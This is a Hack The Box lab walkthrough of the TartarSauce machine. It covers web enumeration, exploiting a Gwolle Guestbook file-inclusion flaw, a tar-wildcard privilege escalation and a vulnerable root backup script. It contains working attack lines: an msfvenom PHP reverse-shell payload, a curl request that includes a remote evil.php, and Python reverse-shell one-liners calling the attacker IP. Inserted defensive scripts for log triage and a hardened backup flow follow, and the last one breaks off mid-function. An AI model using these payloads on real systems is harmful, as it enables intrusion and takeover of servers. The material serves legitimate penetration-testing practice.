TartarSauce Walkthrough - Hack The Box

TartarSauce

TartarSauce is a vulnerable GNU/Linux web server on Hack The Box. This post outlines the penetration testing methodology used against the target and details the steps taken to exploit it and escalate privileges to root.

Scanning

Using Nmap, we run a TCP SYN scan along with a UDP scan. The UDP scan comes up empty, but the TCP scan reveals a running web server:

# Nmap 7.92 scan initiated Sat Oct 29 11:36:10 2022 as: nmap -sSV -p- -A -Pn -v -oA tcp-tartarsauce
Nmap scan report for tartarsauce.htb (10.129.1.185)
Host is up (0.017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=9/24%OT=80%CT=1%CU=32627%PV=Y%DS=2%DC=T%G=Y%TM=632EDDC
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M539ST11NW7%O2=M539ST11NW7%O3=M539NNT11NW7%O4=M539ST11NW7%O5=M539ST1
OS:1NW7%O6=M539ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M539NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 43.817 days (since Thu Aug 11 16:00:12 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   13.73 ms 10.10.14.1
2   15.29 ms tartarsauce.htb (10.129.1.185)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 29 11:36:49 2022 -- 1 IP address (1 host up) scanned in 38.91 seconds

The scan output, including the HTTP Server header, indicates that the target is most likely a GNU/Linux system running Apache httpd 2.4.18 on Ubuntu.

Enumeration

Recursively brute-forcing directories on the web server (first the document root, then /webservices) reveals a WordPress installation at /webservices/wp/.

┌──(kali㉿kali)-[/mnt/kali-shared/HTB/tartarsauce]
└─$ gobuster dir -u http://10.129.1.185 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt                                                       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.1.185
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/29 11:43:46 Starting gobuster in directory enumeration mode
===============================================================
/webservices          (Status: 301) [Size: 318] [--> http://10.129.1.185/webservices/]
/server-status        (Status: 403) [Size: 300]                                       
                                                                                      
===============================================================
2022/10/29 11:51:40 Finished
===============================================================
                                                                                                                                                               
┌──(kali㉿kali)-[/mnt/kali-shared/HTB/tartarsauce]
└─$ gobuster dir -u http://10.129.1.185/webservices -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.1.185/webservices
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/10/29 11:58:23 Starting gobuster in directory enumeration mode
===============================================================
/wp                   (Status: 301) [Size: 321] [--> http://10.129.1.185/webservices/wp/]
                                                                                         
===============================================================
2022/10/29 12:06:27 Finished
===============================================================

Having confirmed that we have a running WordPress instance on the server, we can run a scan on the target for further information gathering and to determine potential vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://10.129.1.185/webservices/wp/ --enumerate ap,at,cb,dbe,u --plugins-detection aggressive                                             2 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.129.1.185/webservices/wp/ [10.129.1.185]
[+] Started: Sat Oct 29 12:14:56 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.129.1.185/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.129.1.185/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.129.1.185/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:09:06 <=========================================================================> (100928 / 100928) 100.00% Time: 00:09:06
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/
 | Last Updated: 2022-09-28T15:27:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.0.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/akismet/readme.txt

[+] brute-force-login-protection
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/
 | Latest Version: 1.5.3 (up to date)
 | Last Updated: 2017-06-29T10:39:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/, status: 403
 |
 | Version: 1.5.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt

[+] gwolle-gb
 | Location: http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/
 | Last Updated: 2022-10-28T09:58:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | [!] The version is out of date, the latest version is 4.3.0
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/, status: 200
 |
 | Version: 2.3.10 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:15 <===========================================================================> (24817 / 24817) 100.00% Time: 00:02:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'

[+] twentyseventeen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'

[+] twentysixteen
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.7
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'

[+] voce
 | Location: http://10.129.1.185/webservices/wp/wp-content/themes/voce/
 | Latest Version: 1.1.0 (up to date)
 | Last Updated: 2017-09-01T00:00:00.000Z
 | Readme: http://10.129.1.185/webservices/wp/wp-content/themes/voce/readme.txt
 | Style URL: http://10.129.1.185/webservices/wp/wp-content/themes/voce/style.css
 | Style Name: voce
 | Style URI: http://limbenjamin.com/pages/voce-wp.html
 | Description: voce is a minimal theme, suitable for text heavy articles. The front page features a list of recent ...
 | Author: Benjamin Lim
 | Author URI: https://limbenjamin.com
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/voce/, status: 500
 |
 | Version: 1.1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.129.1.185/webservices/wp/wp-content/themes/voce/style.css, Match: 'Version: 1.1.0'

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:40 <================================================================================> (137 / 137) 100.00% Time: 00:00:40

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <======================================================================================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] wpadmin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Oct 29 12:27:35 2022
[+] Requests Done: 126007
[+] Cached Requests: 42
[+] Data Sent: 36.717 MB
[+] Data Received: 17.204 MB
[+] Memory used: 488.57 MB
[+] Elapsed time: 00:12:38

We now have a username, but with the brute-force-login-protection plugin active, brute-forcing its password does not get us anywhere. Another of the enumerated plugins, gwolle-gb, however turns up a potentially exploitable vulnerability.

┌──(kali㉿kali)-[~]
└─$ searchsploit gwolle           
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                               |  Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion                                                              | php/webapps/38861.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Vulnerability Assessment

Although WPScan reports the Gwolle Guestbook plugin as version 2.3.10 and the exploit was tested against 1.5.3, the vulnerability may still exist in later versions, so it is worth testing.

We can test for this remote file inclusion vulnerability by generating a payload and following the documented exploit.

  Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/38861
     Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
File Type: Unicode text, UTF-8 text, with very long lines (392)

Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015
Vendor Patch: October 16, 2015
Public Disclosure: November 4, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File Inclusion (RFI) vulnerability in the Gwolle Guestbook WordPress plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.

The HTTP GET parameter "abspath" is not properly sanitized before being used in the PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its contents on the vulnerable web server. To do so, the attacker needs to place a malicious 'wp-load.php' file in his server's document root and include the server's URL in the request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

In order to exploit this vulnerability, 'allow_url_include' must be set to 1. Otherwise, an attacker may still include local files and execute arbitrary code.

Successful exploitation of this vulnerability will lead to compromise of the entire WordPress installation, and may even lead to compromise of the entire web server.


-----------------------------------------------------------------------------------------------

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23275 - https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Exploitation

Using msfvenom, we generate a PHP reverse-shell payload that connects back to our attack machine:

┌──(kali㉿kali)-[~]
└─$ msfvenom -p php/reverse_php LHOST=10.10.14.36 LPORT=4444 > evil.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 3015 bytes

After setting up our netcat listener, we make the HTTP GET request:

┌──(kali㉿kali)-[~]
└─$ curl http://10.129.1.185/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.36/evil.php

The exploit works, and we receive a reverse shell as www-data, which we then upgrade with a Python one-liner.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.1.185] 51786
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
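As an added example (not part of the original walkthrough), here is a shell script a defender could run over Apache access logs to triage requests that abuse the Gwolle abspath parameter described above: legitimate calls carry a plain path under the WordPress root, so a URL scheme, traversal, percent-encoding, or a path outside that root is worth an alert. The log lines, addresses and the WordPress root path are constructed for the example; rfi_hits and write_sample_log are this example's own helpers.

```shell
#!/bin/sh
# Added example: triage an Apache access log for requests that abuse the
# Gwolle Guestbook "abspath" parameter (CVE-2015-8351).

# rfi_hits LOGFILE WP_ROOT : print every suspicious request line
rfi_hits() {
    local log=$1 root=$2 line val
    grep -i 'ajaxresponse\.php?[^" ]*abspath=' "$log" |
    while IFS= read -r line; do
        # pull the raw abspath value out of the query string
        val=$(printf '%s\n' "$line" | sed -n 's/.*[?&]abspath=\([^&" ]*\).*/\1/p')
        case "$val" in
            *://*|*..*|*%*) printf '%s\n' "$line" ;;   # remote include, traversal, encoding
            "$root"*)       ;;                          # expected local prefix: benign
            *)              printf '%s\n' "$line" ;;   # some other local path: LFI attempt
        esac
    done
}

# Constructed sample log in combined format; hosts and addresses are made up.
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.5 - - [29/Oct/2022:12:30:01 +0000] "GET /webservices/wp/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Oct/2022:12:30:02 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.9 - - [29/Oct/2022:12:31:10 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://198.51.100.7/ HTTP/1.1" 200 0 "-" "curl/7.85.0"
203.0.113.9 - - [29/Oct/2022:12:31:11 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=../../../../etc/ HTTP/1.1" 500 0 "-" "curl/7.85.0"
203.0.113.9 - - [29/Oct/2022:12:31:12 +0000] "GET /webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=/tmp/ HTTP/1.1" 200 0 "-" "curl/7.85.0"
EOF
}
```

Of the five constructed lines, the remote URL, the traversal and the /tmp/ path are reported; the request that passes the real WordPress root is not.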

Further enumeration as the www-data user reveals that we can run tar as the onuma user via sudo without supplying a password.

www-data@TartarSauce:/tmp$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar

We can abuse this privilege to gain a reverse shell as the onuma user, by using tar's --checkpoint-action option, which runs an arbitrary command each time a checkpoint is reached.

</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cat <<'EOT'> /tmp/shell.sh
> #!/bin/bash
> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
> EOT
</wp/wp-content/plugins/gwolle-gb/frontend/captcha$ cd /tmp
www-data@TartarSauce:/tmp$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@TartarSauce:/tmp$ echo "" > --checkpoint=1
www-data@TartarSauce:/tmp$ sudo -u onuma tar czf /tmp/backup.tar.gz *

Setting up a netcat listener and executing the above commands gives us a reverse shell as the onuma user.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444                                    
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.129.1.185] 51790
$ id    
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

Enumeration as the onuma user with pspy reveals a backuperer process that runs every 5 minutes with root privileges.

onuma@TartarSauce:/tmp$ ./pspy-32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/10/29 08:26:31 CMD: UID=0    PID=999    | /lib/systemd/systemd-logind 
2022/10/29 08:26:31 CMD: UID=104  PID=997    | /usr/sbin/rsyslogd -n 
2022/10/29 08:26:31 CMD: UID=108  PID=978    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation 
2022/10/29 08:26:31 CMD: UID=0    PID=977    | /usr/sbin/acpid 
2022/10/29 08:26:31 CMD: UID=0    PID=976    | /usr/sbin/atd -f 
...
2022/10/29 08:30:41 CMD: UID=???  PID=4958   | ???
2022/10/29 08:30:41 CMD: UID=???  PID=4957   | ???
2022/10/29 08:30:41 CMD: UID=???  PID=4956   | ???
2022/10/29 08:30:41 CMD: UID=0    PID=4955   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4954   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4953   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4952   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4951   | /lib/systemd/systemd-udevd 
2022/10/29 08:30:41 CMD: UID=0    PID=4950   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4966   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4965   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:41 CMD: UID=0    PID=4995   | /usr/bin/printf - 
2022/10/29 08:30:41 CMD: UID=0    PID=5000   | /bin/bash /usr/sbin/backuperer 
2022/10/29 08:30:42 CMD: UID=0    PID=5005   | /usr/bin/printf - 

Taking a closer look at /usr/sbin/backuperer reveals a backup script.

onuma@TartarSauce:~$ cat /usr/sbin/backuperer
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :  $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi

Studying the backup script, we see that it archives /var/www/html (as onuma) into a hidden, randomly named file in /var/tmp, waits 30 seconds, extracts that archive as root into /var/tmp/check and runs an integrity check. The integrity check is a recursive diff of the extracted copy against the original directory. We want diff to return exit code 1, meaning it found differences: in that case the script exits without cleaning up /var/tmp/check, so whatever was extracted there stays on disk. For diff to compare anything at all, the archive we substitute must reproduce the same var/www/html directory structure.
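As an added example (not the box's script), below is a hardened rewrite of the backuperer flow that closes the race the walkthrough goes on to exploit: the archive is staged in a private directory instead of /var/tmp, its hash is checked after the wait and before extraction, extraction does not honour archived ownership, and setuid/setgid bits are stripped from the extracted tree. safe_backup, strip_special_bits and the hook argument are this example's own names.

```shell
#!/bin/sh
# Added example: hardened backuperer flow. The original is exploitable because
# (a) it writes the archive to the world-writable /var/tmp, (b) it sleeps 30 s
# between creating and extracting it, giving anyone time to swap the file, and
# (c) root extracts whatever is there with ownership and mode bits intact.
set -u

# strip_special_bits DIR: clear setuid/setgid from every regular file under DIR.
# Belt-and-braces in case a tampered archive still reaches extraction.
strip_special_bits() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec chmod u-s,g-s {} +
}

# safe_backup SRC_DIR DEST_ARCHIVE [HOOK]
#   HOOK is a command evaluated where the original script slept for 30 s; it
#   exists only so a test can simulate an attacker replacing the archive.
#   Exit codes: 0 ok, 1 bad input or tar failure, 3 archive changed during the
#   wait, 4 extracted tree differs from SRC_DIR (integrity failure).
safe_backup() {
    local src dest hook work tmpfile check expected actual
    src=$(cd "$1" 2>/dev/null && pwd -P) || return 1
    dest=$2 hook=${3:-:}
    # (a) private work dir (mktemp -d creates it mode 0700) instead of /var/tmp
    work=$(mktemp -d) || return 1
    tmpfile=$work/backup.tgz check=$work/check
    # archive with the same relative layout the original script used
    tar -C / -czf "$tmpfile" "${src#/}" 2>/dev/null || { rm -rf "$work"; return 1; }
    expected=$(sha256sum "$tmpfile" | cut -d' ' -f1)

    eval "$hook"    # the original's /bin/sleep 30 lives here

    # (b) refuse to extract anything that is not the archive we just wrote
    actual=$(sha256sum "$tmpfile" | cut -d' ' -f1)
    [ "$actual" = "$expected" ] || { rm -rf "$work"; return 3; }

    # (c) extract without honouring archived ownership, then clear special
    # bits; in production this step should also run as the unprivileged user
    mkdir "$check" || { rm -rf "$work"; return 1; }
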